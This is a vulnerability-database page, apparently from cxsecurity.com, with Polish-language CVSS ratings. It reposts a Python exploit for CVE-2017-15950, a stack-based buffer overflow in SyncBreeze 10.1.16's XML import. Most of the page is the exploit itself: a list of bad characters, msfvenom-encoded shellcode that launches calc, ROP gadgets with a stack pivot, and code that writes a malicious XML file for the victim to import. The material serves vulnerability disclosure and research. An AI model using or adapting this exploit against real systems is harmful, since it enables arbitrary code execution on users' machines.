SyncBreeze 10.1.16 Buffer Overflow

2021.03.29
Credit: Rafael Machado
Risk: High
Local: No
Remote: Yes
CVE: CVE-2017-15950
CWE: CWE-119


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow # Date: 03/27/2021 # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com # Vendor: https://www.syncbreeze.com/ # Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html # Version: SyncBreeze v10.1.16 x86 # Tested on: Windows 10 x64 (19042.867) # CVE: CVE-2017-15950 Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. # -*- coding: utf-8 -*- import struct # badchars #\x00\x0a\x0d\x20\x27 #\x81\x82\x83\x84\x85\x86\x87\x88 #\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90 #\x91\x92\x93\x94\x95\x96\x97\x98 #\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0 #\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8 #\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0 #\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8 #\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0 #\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8 #\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0 #\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8 #\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0 #\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8 #\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0 #\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8 #\xF9\xFA\xFB\xFC\xFD\xFE\xFF # Shellcode payload size: 432 bytes # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python shellcode = b"" shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69" shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30" shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e" shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c" shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66" shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61" shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65" shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d" shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36" shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a" shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a" shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b" shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70" shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b" shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39" shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71" shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54" shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54" shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71" shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c" shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68" shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50" shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31" shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f" shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44" shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31" shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33" shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f" shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78" shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55" shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63" shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70" shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74" shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f" shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43" shellcode += b"\x30\x41\x41" # padding to crash buffer basura = struct.pack('<L', 0x41414141) * 390 # gadgets to move payload pointer into EAX GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX # padding to reach buffer address stored in ebp basura2 = struct.pack('<L', 0x41414141) * 56 # padding for stack pivot padding = struct.pack('<L', 0x41414141) * 4 padding2 = struct.pack('<L', 0x41414141) * 20 # stack pivot to reach an area with more space for gadgets on the stack # 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret pivot = struct.pack('<L', 0x6506491c) # final payload fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode # write payload to xml file payload = open("xplSyncBreeze.xml", "wb") payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8')) payload.write("<sync name='".encode('utf-8')) payload.write(fruta) payload.write("'>\n</sync>\n".encode('utf-8')) payload.close()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top